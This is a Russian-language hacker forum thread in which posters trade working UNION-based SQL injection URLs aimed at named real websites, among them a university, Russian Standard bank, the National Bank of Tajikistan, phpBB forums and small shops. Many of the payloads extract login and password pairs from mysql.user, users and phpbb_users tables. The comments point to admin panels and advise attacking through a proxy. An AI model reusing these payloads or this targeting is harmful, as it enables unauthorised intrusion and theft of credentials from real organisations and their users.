SQL Инъекции

edu

Code:

http://cat.xula.edu/courses/index.php?mode=view&id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

 

какой-то тайваньский сайтег

Code:

http://www.so-net.net.tw/qa/index1.html?c_id=2000000262+union+select+1111,concat(user,0x3a,password)+from+mysql.user/*
http://www.so-net.net.tw/qa/index1.html?c_id=2000000262+union+select+1111,concat(account,0x3a,password)+from+sell_account/*

Code:

http://www.ballys.ee/casino.php?sisu=uudised&id=101+union+select+1,USER(),3,4/*

 

Code:

http://www.detskidom.info/magazine/?act=more&id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3/*

Вывод в title'е:

Code:

http://www.illodemiur.ru/?page=guide&id=-1+union+select+1,2,convert(concat(username,char(58),user_password),char),4,5+from+phpbb_users+limit+1,1/*

 

Code:

http://www.spaceref.com./news/viewsrtype.html?id=359'+union+select+1,2,user(),4,5,6/*&sdb=companies&name=Moon+Resort+and+Casino

 

Code:

http://www.streetfighters.ru/gallery/index.html?id=5+union+select+1,2,3,4,5,6,7,concat(version(),char(58),user()),9+from+users/*

С колонками сами)) Без прокси НЕ лезть!!

 

=\ не льёцо в /tmp, хотя может просто я глючу

 

www.rs.ru

Русский Стандарт банк

Ни 1,2,3 ни null, не помогают, но через order+by их там 15-16 штук.

Code:

http://www.rs.ru/ru/index.php?id70=-1+order+by+16/*

 

Я снова тут)))

Code:

http://www.ccrl.ca/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

Code:

http://www.koienterprise.com/buyKoi.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10/*

Code:

http://www.howdtheyvote.ca/member.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*

 

<noindex>www.nbt.tj

Национальный банк Таджикистана

Code:

http://www.nbt.tj/?c=5&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

</noindex>

 

____

 

http://provodka.ru/zakon.php?s=-1+union+select+user()/*


http://www.mosinform.ru/content.php?s=-1+union+select+1,2,3,444,5,6,7,8,9,10+from+news/*


http://www.stove.ru/index.php?lng=0&rs=-1+union+select+concat(table_name,0x3a,version()),2,3,4,5,6+from+information_schema.tables/*

 

при неправильном запросе вылетает алерт с описанием ошибки + перекидывает на страницу назад. Наркоманы =\

 

www.stena.ru

Вывод в тайтле.

Code:

http://www.stena.ru/catalog.php?page=-1+union+select+1,concat(version(),char(58),user(),char(58),database()),3,4/*

 

SQLite
разбираться влом. Таблицы не подобрал, не очень то и старался

 

privet.zp.ua

Code:

http://privet.zp.ua/part4.php3?catid=-1+union+select+version()/*

www.eatoutnewyork.com

Code:

http://www.eatoutnewyork.com/orgs/show.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16.../*

 

Code:

http://www.69.is/openlink.php?id=-35207+union+select+1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12+from+users/*

http://www.69.is/admin/

Code:

http://www.beygla.is/fullnews.php?id=704+union+select+1,2,3,4,5,6,7,8+limit+1,1/*&table=news

не выводится на екран((

 

Пантера, там пароль и соль в другой таблице. Вотъ

ЗЫ Сплоенд от РСТ рулит =)

 

www.chayclub.ru

Клуб любителей чайочка =)
Там и админка рядом.

Code:

http://www.chayclub.ru/index.php?page=63&id=-1+union+select+1,2,3,4,5,6,concat(login,char(58),password),8+from+users/*

www.crimeahouse.ru

Хотите квартиру в криму ? трафа мало... кто хочет доперебирайте колонки...

Code:

http://www.crimeahouse.ru/index.php?pageId=12&region=3&acat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50......./*

 

http://www.hifisalon.ru/index.php?n=-333+union+select+1,user(),concat(0x2d2d2d2d2d2d2d2d2d2d2d2d2d3e,table_name)+from+information_schema.tables+limit+5,2/*

 

Code:

http://www.chayclub.ru/index.php?page=63&id=-1+union+select+1,2,3,4,5,6,concat(username,char(58),user_email,char(58),user_icq,char(58),user_password),8+from+phpbb_users/*